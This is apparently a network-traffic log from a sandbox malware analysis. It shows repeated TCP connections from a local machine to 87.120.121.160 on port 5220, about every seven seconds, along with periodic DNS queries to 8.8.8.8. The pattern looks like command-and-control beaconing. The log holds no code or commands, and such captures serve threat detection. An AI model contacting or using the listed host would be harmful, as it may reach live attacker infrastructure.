                                              Dec 12, 2024 21:50:11.904805899 CET52204919987.120.121.160192.168.2.22
                                              Dec 12, 2024 21:50:11.905035973 CET491995220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:50:14.052505970 CET52204919987.120.121.160192.168.2.22
                                              Dec 12, 2024 21:50:14.052812099 CET491995220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:50:19.188400030 CET492005220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:50:19.308279991 CET52204920087.120.121.160192.168.2.22
                                              Dec 12, 2024 21:50:19.308386087 CET492005220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:50:21.455248117 CET52204920087.120.121.160192.168.2.22
                                              Dec 12, 2024 21:50:21.455486059 CET492005220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:50:26.608683109 CET492015220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:50:26.728956938 CET52204920187.120.121.160192.168.2.22
                                              Dec 12, 2024 21:50:26.729214907 CET492015220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:50:28.880733013 CET52204920187.120.121.160192.168.2.22
                                              Dec 12, 2024 21:50:28.880816936 CET492015220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:50:34.027301073 CET492025220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:50:34.147284031 CET52204920287.120.121.160192.168.2.22
                                              Dec 12, 2024 21:50:34.147542953 CET492025220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:50:36.283917904 CET52204920287.120.121.160192.168.2.22
                                              Dec 12, 2024 21:50:36.284183979 CET492025220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:50:41.424650908 CET492035220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:50:41.545041084 CET52204920387.120.121.160192.168.2.22
                                              Dec 12, 2024 21:50:41.545156002 CET492035220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:50:43.701528072 CET52204920387.120.121.160192.168.2.22
                                              Dec 12, 2024 21:50:43.701637030 CET492035220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:50:48.845019102 CET492045220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:50:48.964735031 CET52204920487.120.121.160192.168.2.22
                                              Dec 12, 2024 21:50:48.964884043 CET492045220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:50:51.116672039 CET52204920487.120.121.160192.168.2.22
                                              Dec 12, 2024 21:50:51.116760015 CET492045220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:50:56.243340969 CET492055220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:50:56.363231897 CET52204920587.120.121.160192.168.2.22
                                              Dec 12, 2024 21:50:56.363432884 CET492055220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:50:58.522135019 CET52204920587.120.121.160192.168.2.22
                                              Dec 12, 2024 21:50:58.522248030 CET492055220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:51:03.667649031 CET492065220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:51:03.787617922 CET52204920687.120.121.160192.168.2.22
                                              Dec 12, 2024 21:51:03.787864923 CET492065220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:51:05.925163984 CET52204920687.120.121.160192.168.2.22
                                              Dec 12, 2024 21:51:05.925350904 CET492065220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:51:11.062244892 CET492075220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:51:11.182255983 CET52204920787.120.121.160192.168.2.22
                                              Dec 12, 2024 21:51:11.182476997 CET492075220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:51:13.350821018 CET52204920787.120.121.160192.168.2.22
                                              Dec 12, 2024 21:51:13.351038933 CET492075220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:51:18.486798048 CET492085220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:51:18.606945038 CET52204920887.120.121.160192.168.2.22
                                              Dec 12, 2024 21:51:18.607173920 CET492085220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:51:20.739490986 CET52204920887.120.121.160192.168.2.22
                                              Dec 12, 2024 21:51:20.739574909 CET492085220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:51:25.879935980 CET492095220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:51:25.999871016 CET52204920987.120.121.160192.168.2.22
                                              Dec 12, 2024 21:51:26.000193119 CET492095220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:51:28.160065889 CET52204920987.120.121.160192.168.2.22
                                              Dec 12, 2024 21:51:28.160176992 CET492095220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:51:33.307521105 CET492105220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:51:33.427261114 CET52204921087.120.121.160192.168.2.22
                                              Dec 12, 2024 21:51:33.427372932 CET492105220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:51:35.550585032 CET52204921087.120.121.160192.168.2.22
                                              Dec 12, 2024 21:51:35.550822020 CET492105220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:51:40.695082903 CET492115220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:51:40.814994097 CET52204921187.120.121.160192.168.2.22
                                              Dec 12, 2024 21:51:40.815187931 CET492115220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:51:42.941787004 CET52204921187.120.121.160192.168.2.22
                                              Dec 12, 2024 21:51:42.941967010 CET492115220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:51:48.076334000 CET492125220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:51:48.196594000 CET52204921287.120.121.160192.168.2.22
                                              Dec 12, 2024 21:51:48.196932077 CET492125220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:51:50.351327896 CET52204921287.120.121.160192.168.2.22
                                              Dec 12, 2024 21:51:50.351403952 CET492125220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:51:55.497977018 CET492135220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:51:55.620469093 CET52204921387.120.121.160192.168.2.22
                                              Dec 12, 2024 21:51:55.620784044 CET492135220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:51:57.773490906 CET52204921387.120.121.160192.168.2.22
                                              Dec 12, 2024 21:51:57.773586035 CET492135220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:52:02.905169010 CET492145220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:52:03.025105000 CET52204921487.120.121.160192.168.2.22
                                              Dec 12, 2024 21:52:03.025368929 CET492145220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:52:05.179929018 CET52204921487.120.121.160192.168.2.22
                                              Dec 12, 2024 21:52:05.180042028 CET492145220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:52:10.326616049 CET492155220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:52:10.447619915 CET52204921587.120.121.160192.168.2.22
                                              Dec 12, 2024 21:52:10.447758913 CET492155220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:52:12.602269888 CET52204921587.120.121.160192.168.2.22
                                              Dec 12, 2024 21:52:12.602442026 CET492155220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:52:17.743964911 CET492165220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:52:17.863907099 CET52204921687.120.121.160192.168.2.22
                                              Dec 12, 2024 21:52:17.864068031 CET492165220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:52:20.013031960 CET52204921687.120.121.160192.168.2.22
                                              Dec 12, 2024 21:52:20.013232946 CET492165220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:52:25.160921097 CET492175220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:52:25.282030106 CET52204921787.120.121.160192.168.2.22
                                              Dec 12, 2024 21:52:25.282180071 CET492175220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:52:27.411122084 CET52204921787.120.121.160192.168.2.22
                                              Dec 12, 2024 21:52:27.411293983 CET492175220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:52:32.567487955 CET492185220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:52:32.687442064 CET52204921887.120.121.160192.168.2.22
                                              Dec 12, 2024 21:52:32.687582970 CET492185220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:52:34.852461100 CET52204921887.120.121.160192.168.2.22
                                              Dec 12, 2024 21:52:34.852586985 CET492185220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:52:39.998007059 CET492195220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:52:40.118215084 CET52204921987.120.121.160192.168.2.22
                                              Dec 12, 2024 21:52:40.118396997 CET492195220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:52:42.239886999 CET52204921987.120.121.160192.168.2.22
                                              Dec 12, 2024 21:52:42.240014076 CET492195220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:52:47.366841078 CET492205220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:52:47.486732006 CET52204922087.120.121.160192.168.2.22
                                              Dec 12, 2024 21:52:47.486951113 CET492205220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:52:49.614516020 CET52204922087.120.121.160192.168.2.22
                                              Dec 12, 2024 21:52:49.614721060 CET492205220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:52:54.757549047 CET492215220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:52:54.877505064 CET52204922187.120.121.160192.168.2.22
                                              Dec 12, 2024 21:52:54.877794981 CET492215220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:52:57.012444019 CET52204922187.120.121.160192.168.2.22
                                              Dec 12, 2024 21:52:57.012675047 CET492215220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:53:02.138873100 CET492225220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:53:02.258922100 CET52204922287.120.121.160192.168.2.22
                                              Dec 12, 2024 21:53:02.259043932 CET492225220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:53:04.399147987 CET52204922287.120.121.160192.168.2.22
                                              Dec 12, 2024 21:53:04.399437904 CET492225220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:53:09.554881096 CET492235220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:53:09.675498009 CET52204922387.120.121.160192.168.2.22
                                              Dec 12, 2024 21:53:09.675607920 CET492235220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:53:11.802289963 CET52204922387.120.121.160192.168.2.22
                                              Dec 12, 2024 21:53:11.802819014 CET492235220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:53:16.935046911 CET492245220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:53:17.055265903 CET52204922487.120.121.160192.168.2.22
                                              Dec 12, 2024 21:53:17.055357933 CET492245220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:53:19.242007017 CET52204922487.120.121.160192.168.2.22
                                              Dec 12, 2024 21:53:19.242132902 CET492245220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:53:24.388490915 CET492255220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:53:24.509037018 CET52204922587.120.121.160192.168.2.22
                                              Dec 12, 2024 21:53:24.509356022 CET492255220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:53:26.669969082 CET52204922587.120.121.160192.168.2.22
                                              Dec 12, 2024 21:53:26.670469046 CET492255220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:53:31.802896023 CET492265220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:53:31.922934055 CET52204922687.120.121.160192.168.2.22
                                              Dec 12, 2024 21:53:31.923070908 CET492265220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:53:34.073133945 CET52204922687.120.121.160192.168.2.22
                                              Dec 12, 2024 21:53:34.073559999 CET492265220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:53:39.217202902 CET492275220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:53:39.337227106 CET52204922787.120.121.160192.168.2.22
                                              Dec 12, 2024 21:53:39.337435007 CET492275220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:53:41.523745060 CET52204922787.120.121.160192.168.2.22
                                              Dec 12, 2024 21:53:41.524039984 CET492275220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:53:46.660341978 CET492285220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:53:46.780206919 CET52204922887.120.121.160192.168.2.22
                                              Dec 12, 2024 21:53:46.780356884 CET492285220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:53:48.912826061 CET52204922887.120.121.160192.168.2.22
                                              Dec 12, 2024 21:53:48.913031101 CET492285220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:53:54.050513029 CET492295220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:53:54.172976017 CET52204922987.120.121.160192.168.2.22
Dec 12, 2024 21:53:54.173089027 CET | 49229 | 5220 | 192.168.2.22 | 87.120.121.160
Dec 12, 2024 21:53:56.334779978 CET | 5220 | 49229 | 87.120.121.160 | 192.168.2.22
Dec 12, 2024 21:53:56.334953070 CET | 49229 | 5220 | 192.168.2.22 | 87.120.121.160
Dec 12, 2024 21:54:01.467451096 CET | 49230 | 5220 | 192.168.2.22 | 87.120.121.160
Dec 12, 2024 21:54:01.588845015 CET | 5220 | 49230 | 87.120.121.160 | 192.168.2.22
Dec 12, 2024 21:54:01.589147091 CET | 49230 | 5220 | 192.168.2.22 | 87.120.121.160
Dec 12, 2024 21:54:03.745179892 CET | 5220 | 49230 | 87.120.121.160 | 192.168.2.22
Dec 12, 2024 21:54:03.745348930 CET | 49230 | 5220 | 192.168.2.22 | 87.120.121.160
Dec 12, 2024 21:54:08.889147997 CET | 49231 | 5220 | 192.168.2.22 | 87.120.121.160
Dec 12, 2024 21:54:09.009484053 CET | 5220 | 49231 | 87.120.121.160 | 192.168.2.22
Dec 12, 2024 21:54:09.009763002 CET | 49231 | 5220 | 192.168.2.22 | 87.120.121.160
Dec 12, 2024 21:54:10.245476961 CET | 5220 | 49231 | 87.120.121.160 | 192.168.2.22
Dec 12, 2024 21:54:10.287439108 CET | 49231 | 5220 | 192.168.2.22 | 87.120.121.160
Dec 12, 2024 21:54:10.407573938 CET | 5220 | 49231 | 87.120.121.160 | 192.168.2.22
Dec 12, 2024 21:54:19.578073978 CET | 5220 | 49231 | 87.120.121.160 | 192.168.2.22
Dec 12, 2024 21:54:19.578587055 CET | 49231 | 5220 | 192.168.2.22 | 87.120.121.160
Dec 12, 2024 21:54:24.726164103 CET | 49232 | 5220 | 192.168.2.22 | 87.120.121.160
Dec 12, 2024 21:54:24.846676111 CET | 5220 | 49232 | 87.120.121.160 | 192.168.2.22
Dec 12, 2024 21:54:24.847254038 CET | 49232 | 5220 | 192.168.2.22 | 87.120.121.160
Dec 12, 2024 21:54:26.997773886 CET | 5220 | 49232 | 87.120.121.160 | 192.168.2.22
Dec 12, 2024 21:54:26.998219013 CET | 49232 | 5220 | 192.168.2.22 | 87.120.121.160
Dec 12, 2024 21:54:32.146852970 CET | 49233 | 5220 | 192.168.2.22 | 87.120.121.160
Dec 12, 2024 21:54:32.267647028 CET | 5220 | 49233 | 87.120.121.160 | 192.168.2.22
Dec 12, 2024 21:54:32.267987967 CET | 49233 | 5220 | 192.168.2.22 | 87.120.121.160
Dec 12, 2024 21:54:34.420504093 CET | 5220 | 49233 | 87.120.121.160 | 192.168.2.22
Dec 12, 2024 21:54:34.420627117 CET | 49233 | 5220 | 192.168.2.22 | 87.120.121.160
Dec 12, 2024 21:54:39.546040058 CET | 49234 | 5220 | 192.168.2.22 | 87.120.121.160
Dec 12, 2024 21:54:39.666182995 CET | 5220 | 49234 | 87.120.121.160 | 192.168.2.22
Dec 12, 2024 21:54:39.666328907 CET | 49234 | 5220 | 192.168.2.22 | 87.120.121.160
Dec 12, 2024 21:54:41.808653116 CET | 5220 | 49234 | 87.120.121.160 | 192.168.2.22
Dec 12, 2024 21:54:41.809091091 CET | 49234 | 5220 | 192.168.2.22 | 87.120.121.160
Dec 12, 2024 21:54:46.941155910 CET | 49235 | 5220 | 192.168.2.22 | 87.120.121.160
Dec 12, 2024 21:54:47.061180115 CET | 5220 | 49235 | 87.120.121.160 | 192.168.2.22
Dec 12, 2024 21:54:47.061414957 CET | 49235 | 5220 | 192.168.2.22 | 87.120.121.160
Dec 12, 2024 21:54:49.182074070 CET | 5220 | 49235 | 87.120.121.160 | 192.168.2.22
Dec 12, 2024 21:54:49.182459116 CET | 49235 | 5220 | 192.168.2.22 | 87.120.121.160
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 12, 2024 21:45:41.232595921 CET | 54562 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:45:41.603100061 CET | 53 | 54562 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:45:50.418020964 CET | 52917 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:45:50.788270950 CET | 53 | 52917 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:45:58.064232111 CET | 62751 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:45:58.198769093 CET | 53 | 62751 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:46:05.465405941 CET | 57893 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:46:05.837680101 CET | 53 | 57893 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:46:13.118576050 CET | 54821 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:46:13.491419077 CET | 53 | 54821 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:46:20.784152985 CET | 54719 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:46:21.156843901 CET | 53 | 54719 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:46:28.411036015 CET | 49881 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:46:28.545562983 CET | 53 | 49881 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:46:35.823601007 CET | 54998 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:46:35.946887970 CET | 53 | 54998 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:46:43.226644993 CET | 52781 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:46:43.361864090 CET | 53 | 52781 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:46:50.611470938 CET | 63926 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:46:50.745820045 CET | 53 | 63926 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:46:58.002760887 CET | 65510 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:46:58.137223005 CET | 53 | 65510 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:47:05.396903992 CET | 62672 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:47:05.531486988 CET | 53 | 62672 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:47:12.804578066 CET | 56475 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:47:12.938827038 CET | 53 | 56475 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:47:20.183312893 CET | 49384 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:47:20.306443930 CET | 53 | 49384 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:47:27.599539995 CET | 54842 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:47:27.974983931 CET | 53 | 54842 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:47:35.252535105 CET | 58105 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:47:35.624083042 CET | 53 | 58105 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:47:42.884737015 CET | 64928 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:47:43.018866062 CET | 53 | 64928 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:47:50.369386911 CET | 57390 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:47:50.505089998 CET | 53 | 57390 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:47:57.783576012 CET | 58095 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:47:57.922924042 CET | 53 | 58095 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:48:05.222099066 CET | 54261 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:48:05.356887102 CET | 53 | 54261 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:48:12.664558887 CET | 60507 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:48:12.789191008 CET | 53 | 60507 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:48:20.039948940 CET | 50446 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:48:20.175071955 CET | 53 | 50446 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:48:27.484338045 CET | 55939 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:48:27.608385086 CET | 53 | 55939 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:48:34.893986940 CET | 49608 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:48:35.028428078 CET | 53 | 49608 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:48:42.307828903 CET | 61486 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:48:42.443259001 CET | 53 | 61486 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:48:49.730556965 CET | 62453 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:48:49.865164042 CET | 53 | 62453 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:48:57.122718096 CET | 50568 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:48:57.256814957 CET | 53 | 50568 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:49:04.530304909 CET | 61467 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:49:04.665467024 CET | 53 | 61467 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:49:11.941971064 CET | 61618 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:49:12.076205969 CET | 53 | 61618 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:49:19.341698885 CET | 54422 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:49:19.476135969 CET | 53 | 54422 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:49:26.872906923 CET | 52074 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:49:27.244282007 CET | 53 | 52074 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:49:34.505686045 CET | 50337 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:49:34.640294075 CET | 53 | 50337 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:49:41.908653021 CET | 61826 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:49:42.042783976 CET | 53 | 61826 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:49:49.296081066 CET | 56329 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:49:49.430185080 CET | 53 | 56329 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:49:56.762053967 CET | 63469 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:49:56.896336079 CET | 53 | 63469 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:50:04.267986059 CET | 59447 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:50:04.402148962 CET | 53 | 59447 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:50:11.661416054 CET | 51828 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:50:11.784126997 CET | 53 | 51828 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:50:19.052421093 CET | 53406 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:50:19.187814951 CET | 53 | 53406 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:50:26.473809004 CET | 56345 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:50:26.607886076 CET | 53 | 56345 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:50:33.892271996 CET | 51870 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:50:34.026778936 CET | 53 | 51870 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:50:41.288825989 CET | 65009 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:50:41.424036026 CET | 53 | 65009 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:50:48.709347963 CET | 64956 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:50:48.844182968 CET | 53 | 64956 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:50:56.119364977 CET | 54521 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:50:56.242716074 CET | 53 | 54521 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:51:03.540868044 CET | 49750 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:51:03.665529966 CET | 53 | 49750 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:51:10.926779032 CET | 64687 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:51:11.061579943 CET | 53 | 64687 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:51:18.351907969 CET | 65084 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:51:18.486056089 CET | 53 | 65084 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:51:25.744587898 CET | 63373 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:51:25.878966093 CET | 53 | 63373 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:51:33.171979904 CET | 56207 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:51:33.306296110 CET | 53 | 56207 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:51:40.557590008 CET | 51955 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:51:40.693830967 CET | 53 | 51955 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:51:47.941709042 CET | 58971 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:51:48.075679064 CET | 53 | 58971 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:51:55.361670971 CET | 51014 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:51:55.496759892 CET | 53 | 51014 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:52:02.781596899 CET | 49690 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:52:02.904727936 CET | 53 | 49690 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:52:10.190834999 CET | 60169 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:52:10.325464010 CET | 53 | 60169 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:52:17.607659101 CET | 53060 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:52:17.743431091 CET | 53 | 53060 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:52:25.024692059 CET | 49949 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:52:25.159442902 CET | 53 | 49949 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:52:32.431931019 CET | 54027 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:52:32.566340923 CET | 53 | 54027 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:52:39.862896919 CET | 63950 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:52:39.997255087 CET | 53 | 63950 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:52:47.243031979 CET | 58257 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:52:47.366159916 CET | 53 | 58257 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:52:54.621396065 CET | 54738 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:52:54.755981922 CET | 53 | 54738 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:53:02.013331890 CET | 49478 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:53:02.137824059 CET | 53 | 49478 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:53:09.418307066 CET | 49288 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:53:09.553461075 CET | 53 | 49288 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:53:16.799825907 CET | 61598 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:53:16.934592009 CET | 53 | 61598 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:53:24.251733065 CET | 58754 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:53:24.387618065 CET | 53 | 58754 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:53:31.666935921 CET | 49226 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:53:31.802103043 CET | 53 | 49226 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:53:39.080763102 CET | 54695 | 53 | 192.168.2.22 | 8.8.8.8
